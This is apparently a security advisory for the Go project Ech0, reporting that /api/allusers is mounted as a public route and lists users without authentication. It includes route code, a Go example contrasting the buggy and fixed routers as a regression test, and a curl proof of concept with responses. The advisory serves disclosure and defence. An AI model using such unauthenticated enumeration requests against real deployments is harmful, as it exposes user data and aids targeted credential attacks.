Improper authorization control for web services in github.com/lin-snow/ech0

Description

Ech0 exposes the authenticated-only user list via the public /api/allusers endpoint

Summary

GET /api/allusers is mounted as a public endpoint and returns user records without authentication. This allows remote unauthenticated user enumeration and exposure of user profile metadata.

Details

The route is registered under public routes:

    internal/router/user.go:17

      appRouterGroup.PublicRouterGroup.GET("/allusers", h.UserHandler.GetAllUsers())

The handler itself is documented as requiring authentication:

    internal/handler/user/user.go:177-185

      API docs/annotations indicate auth requirement (@Security ApiKeyAuth).
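
The mismatch above, rebuilt as an added Go example that is not Ech0's own code: the project's Gin router is replaced by net/http, a stand-in /api/allusers handler is mounted either on an unguarded mux (mirroring the public-group registration) or behind an authentication middleware (mirroring the fix), and the middleware, the bearer token and the user records are assumptions constructed for the demonstration.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)
// requireAuth stands in for the project's auth middleware (assumption: a fixed bearer token).
func requireAuth(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get("Authorization") != "Bearer valid-token" {
			http.Error(w, `{"code":401,"msg":"unauthorized"}`, http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// allUsers stands in for UserHandler.GetAllUsers; the user records are constructed samples.
func allUsers(w http.ResponseWriter, _ *http.Request) {
	fmt.Fprint(w, `[{"id":1,"username":"admin"},{"id":2,"username":"alice"}]`)
}

// NewRouter: fixed=false mounts /api/allusers on the public group (the bug); fixed=true mounts it behind requireAuth (the fix).
func NewRouter(fixed bool) http.Handler {
	var h http.Handler = http.HandlerFunc(allUsers)
	if fixed {
		h = requireAuth(h)
	}
	mux := http.NewServeMux()
	mux.Handle("/api/allusers", h)
	return mux
}

// StatusFor issues an in-process GET (optional bearer token) and returns the status code.
func StatusFor(router http.Handler, path, token string) int {
	req := httptest.NewRequest(http.MethodGet, path, nil)
	if token != "" {
		req.Header.Set("Authorization", "Bearer "+token)
	}
	rec := httptest.NewRecorder()
	router.ServeHTTP(rec, req)
	return rec.Code
}
func main() {
	fmt.Println("public group, no token:", StatusFor(NewRouter(false), "/api/allusers", "")) // 200
	fmt.Println("auth group, no token:", StatusFor(NewRouter(true), "/api/allusers", ""))    // 401
	fmt.Println("auth group, valid token:", StatusFor(NewRouter(true), "/api/allusers", "valid-token"))
}
```

The same in-process check, run against a deployment's real router, is a cheap regression test that any route documented with @Security ApiKeyAuth actually refuses anonymous requests.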

PoC

1) Negative control: endpoint that should require auth

Request:

curl -i "http://localhost:6277/api/user"

Response:

HTTP/1.1 401 Unauthorized
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PATCH, PUT
Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0
Content-Language: zh-CN
Content-Type: application/json; charset=utf-8
Expires: 0...

2) Trigger: call public user-list endpoint without auth

Request:

curl -i "http://localhost:6277/api/allusers"

Response:

HTTP/1.1 200 OK
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PATCH, PUT
Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type
Content-Language: zh-CN
Content-Type: application/json; charset=utf-8
Date: Sun, 22 Mar 2026 07:21:56 GMT
Content-Length: 912...

Impact

Vulnerability type: Access control bypass / unauthenticated data exposure.
Who is impacted: Any deployment exposing the API to untrusted networks, and all users whose profile metadata can be enumerated.
Business/security impact: Enables account reconnaissance and targeted credential attacks.

A fix is available at https://github.com/lin-snow/Ech0/releases/tag/v4.2.0.

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.
